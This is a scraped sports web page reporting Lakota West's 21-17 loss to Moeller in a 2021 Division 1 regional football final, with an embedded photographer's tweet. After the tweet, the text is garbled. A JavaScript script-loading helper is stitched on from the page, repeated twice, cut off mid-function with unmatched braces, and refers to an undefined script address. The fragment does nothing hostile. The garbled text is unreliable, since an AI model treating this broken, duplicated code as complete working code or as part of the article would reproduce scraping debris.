Football
Lakota West falls to Moeller in D1 regional football final 21-17
Article found at journal-news.com
Pics posted from @LakotaWestFB vs. @LetsGoBigMoe Regional Final (11.19.21). Another incredibly memorable & exciting season for the Firebirds! To the Class of 2022… Wishing you nothing but the very best! @westfirebirds @LakotaWestAD @gmcsports Pics Link: https://t.co/6FwNAp2rII pic.twitter.com/BNc5rvEjoN
— jwaltersphotography (@jenwaltersphoto) November 23, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();